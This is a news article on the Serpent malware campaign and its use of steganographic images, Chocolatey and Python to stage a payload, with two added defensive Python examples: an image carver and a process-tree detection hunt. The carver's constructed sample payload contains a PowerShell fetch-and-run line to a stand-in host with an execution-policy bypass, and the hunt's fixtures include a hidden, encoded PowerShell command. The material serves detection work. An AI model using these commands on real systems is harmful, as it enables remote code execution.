New Serpent Malware Uses Unusual Infiltration Tactics

Security researchers have discovered a campaign spreading a novel strain of malware named Serpent. The tools and methods used to infiltrate its victims are what set Serpent apart from more pedestrian malware.

A research team at the security company Proofpoint is tracking the campaign, which spreads Serpent to targets in France. The team describes Serpent as "advanced" malware that uses unusual tactics.

Serpent starts boring, evolves into the unusual

Serpent is spread using email lures and garden-variety malicious attachments. That is not where things get interesting. Between the initial compromise and delivery of the final payload, however, Serpent does a lot of snaking around to avoid detection, using tactics the researchers say they had not encountered before.

Serpent starts its infection chain in a very mundane way: emails carrying attachments with VBA macros in them. The social engineering lure in the subject lines and body text of the emails references the European Union's General Data Protection Regulation (GDPR).

Once the macro executes, it retrieves a URL that serves what appears to be an ordinary image but uses steganography to hide a PowerShell script among the image data. The script is additionally encoded in base64, so the download looks like a plain image fetch to anything inspecting it on the wire.
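The article does not describe how the PowerShell script is embedded in the image. The following carver is an added example written for this page (it is not Proofpoint's tooling or anything from the campaign) and it assumes the common low-effort variant of this trick: base64 text appended after the image's end-of-file marker (the JPEG EOI bytes FF D9 or the PNG IEND chunk). As a fallback it also scans the whole file for long base64 runs that decode to text containing PowerShell keywords. The sample payload, the carrier images and the `example.invalid` URL are all constructed for the demonstration.

```python
"""Carve a base64-encoded PowerShell script hidden inside an image file.

Added example, not code from the original article or from Proofpoint. The
embedding method (base64 appended after the image terminator) is an assumption.
"""
from __future__ import annotations

import base64
import binascii
import re

# A run of 40+ base64 characters with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
# Lower-cased PowerShell indicators; two of them must be present to count a hit.
PS_MARKERS = ("invoke-expression", "iex", "downloadstring", "net.webclient",
              "-encodedcommand", "invoke-webrequest", "start-process", "choco")


def trailing_data(blob: bytes) -> bytes:
    """Bytes after the image terminator: JPEG EOI (FF D9) or the PNG IEND chunk.

    Neither marker can occur inside base64 text (0xFF and 0x00 are not base64
    characters), so searching for the last occurrence is safe.
    """
    if blob.startswith(b"\xff\xd8"):
        i = blob.rfind(b"\xff\xd9")
        return blob[i + 2:] if i != -1 else b""
    if blob.startswith(b"\x89PNG\r\n\x1a\n"):
        i = blob.rfind(b"\x00\x00\x00\x00IEND")      # zero-length IEND chunk
        return blob[i + 12:] if i != -1 else b""     # length(4) + type(4) + CRC(4)
    return b""


def _decode(run: bytes) -> bytes | None:
    """Strict base64 decode; if neighbouring bytes spoiled the run, trim it to a multiple of 4."""
    try:
        return base64.b64decode(run, validate=True)
    except binascii.Error:
        body = run.rstrip(b"=")
        body = body[: len(body) - len(body) % 4]
        try:
            return base64.b64decode(body, validate=True)
        except binascii.Error:
            return None


def _as_powershell(dec: bytes) -> str | None:
    """Return the decoded text if it reads like PowerShell (UTF-8 or UTF-16LE)."""
    candidates = [dec.decode("utf-8", "replace")]
    if len(dec) % 2 == 0:
        candidates.append(dec.decode("utf-16-le", "ignore"))
    for text in candidates:
        low = text.lower()
        if sum(m in low for m in PS_MARKERS) >= 2:
            return text
    return None


def carve_powershell(blob: bytes) -> list[str]:
    """Scripts found in the trailer first, then anywhere in the file (deduplicated)."""
    hits: list[str] = []
    for region in (trailing_data(blob), blob):
        for m in B64_RUN.finditer(region):
            dec = _decode(m.group(0))
            if dec is None:
                continue
            text = _as_powershell(dec)
            if text and text not in hits:
                hits.append(text)
    return hits


# Constructed sample payload and carrier images (not the real campaign's artifacts).
SAMPLE_PS = (
    b"Set-ExecutionPolicy Bypass -Scope Process -Force\r\n"
    b"IEX ((New-Object Net.WebClient).DownloadString('https://example.invalid/install.ps1'))\r\n"
    b"choco install -y python\r\n"
)


def build_sample_jpeg(payload: bytes = SAMPLE_PS) -> bytes:
    # SOI, a minimal APP0/JFIF segment, filler, EOI, then the appended base64 text.
    return (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
            + b"\x00" * 64 + b"\xff\xd9" + base64.b64encode(payload))


def build_sample_png(payload: bytes = SAMPLE_PS) -> bytes:
    # PNG signature, an IEND chunk with its CRC, then the appended base64 text.
    return (b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x00IEND\xaeB`\x82"
            + base64.b64encode(payload))


if __name__ == "__main__":
    for script in carve_powershell(build_sample_jpeg()):
        print(script)
```

Run against a real suspect image with `carve_powershell(open(path, "rb").read())`. If this returns nothing, the payload may be hidden in pixel data or in an embedded chunk rather than appended, which is outside what this carver assumes.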

The first thing the script does is download and install Chocolatey, a legitimate, widely used open-source package manager for Windows. Nothing malicious has been dropped at this point: Chocolatey is ordinary administrative software, which is exactly why reputation-based automated defences are unlikely to flag the download.

Chocolatey is then used to install Python, including pip, Python's own package installer. pip in turn installs several dependencies on the targeted system, including a library that allows traffic to be routed through proxy servers.

The same PowerShell script retrieves a second image URL, once again using steganography to hide a base64-encoded script, this time written in Python. The script is saved under a name chosen to mimic a Microsoft security component, "MicrosoftSecurityUpdate.py", and is executed through a batch file that the original PowerShell script creates.
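Every tool in the chain above is legitimate, so no single process-creation event is damning on its own; the signal is the combination under one PowerShell process. The hunt below is an added example written for this page, not a Proofpoint detection. It correlates weak indicators across each powershell.exe process tree using constructed events in a simplified Sysmon Event ID 1 shape; the paths, the `GDPR_notice.docm` file name, the `proxylib` package name, the `run.bat` name and the threshold are assumptions for illustration.

```python
"""Correlate the Chocolatey -> Python -> batch-file chain across a process tree.

Added example, not code from the original article or from Proofpoint.
Events are constructed (not real telemetry) in a simplified Sysmon Event ID 1 shape.
"""
import re
from collections import defaultdict

# Constructed sample events; paths, file names and package names are placeholders.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n C:\Users\u\Downloads\GDPR_notice.docm'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgA..."},
    {"pid": 300, "ppid": 200, "image": r"C:\ProgramData\chocolatey\choco.exe",
     "cmdline": "choco install -y python"},
    {"pid": 400, "ppid": 200, "image": r"C:\Python310\python.exe",
     "cmdline": "python.exe -m pip install proxylib"},          # placeholder package name
    {"pid": 500, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\run.bat"},
    {"pid": 600, "ppid": 500, "image": r"C:\Python310\python.exe",
     "cmdline": r"python.exe C:\Users\u\AppData\Local\Temp\MicrosoftSecurityUpdate.py"},
    # Benign activity for contrast: an admin using PowerShell and Chocolatey normally.
    {"pid": 700, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 800, "ppid": 700, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\"},
    {"pid": 900, "ppid": 700, "image": r"C:\ProgramData\chocolatey\choco.exe",
     "cmdline": "choco install -y git"},
]

OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe")
LOOKALIKE_PY = re.compile(r"microsoft\S*(update|security)\S*\.py", re.I)


def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def indicators_for(ev: dict, by_pid: dict) -> set:
    """Atomic indicators one event contributes; each is weak on its own."""
    name, cmd = _name(ev["image"]), ev["cmdline"].lower()
    parent = by_pid.get(ev["ppid"])
    pname = _name(parent["image"]) if parent else ""
    out = set()
    if name == "powershell.exe" and pname in OFFICE:
        out.add("office_spawned_powershell")
    if name == "choco.exe" and "install" in cmd and "python" in cmd:
        out.add("choco_installs_python")
    if name == "python.exe" and "pip" in cmd and "install" in cmd:
        out.add("pip_installs_dependency")
    if name == "cmd.exe" and ".bat" in cmd and pname == "powershell.exe":
        out.add("batch_launched_by_powershell")
    if name == "python.exe" and LOOKALIKE_PY.search(cmd):
        out.add("microsoft_lookalike_python_script")
    return out


def detect(events: list, threshold: int = 2) -> list:
    """Flag each powershell.exe whose subtree accumulates >= threshold distinct indicators."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    def subtree(pid):
        stack, seen = [pid], []
        while stack:
            for c in children.get(stack.pop(), []):
                seen.append(c)
                stack.append(c["pid"])
        return seen

    findings = []
    for root in events:
        if _name(root["image"]) != "powershell.exe":
            continue
        inds = set(indicators_for(root, by_pid))
        for e in subtree(root["pid"]):
            inds |= indicators_for(e, by_pid)
        if len(inds) >= threshold:
            findings.append({"root_pid": root["pid"], "cmdline": root["cmdline"],
                             "indicators": sorted(inds)})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["root_pid"], f["cmdline"], f["indicators"])
```

The admin's `choco install -y git` under explorer.exe is deliberately not flagged: the rule keys on accumulation under a PowerShell root rather than on any one tool, which is what keeps it quiet on hosts where Chocolatey and Python are used legitimately. Feed it real events by mapping Sysmon's ProcessId, ParentProcessId, Image and CommandLine fields onto the same four keys.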

The malware's subsequent behavior is more conventional, but the unusual tactics and the staged installation of several legitimate tools to deliver the final payload make Serpent noteworthy. The final payload itself is also a new, previously unseen piece of malware.

March 23, 2022
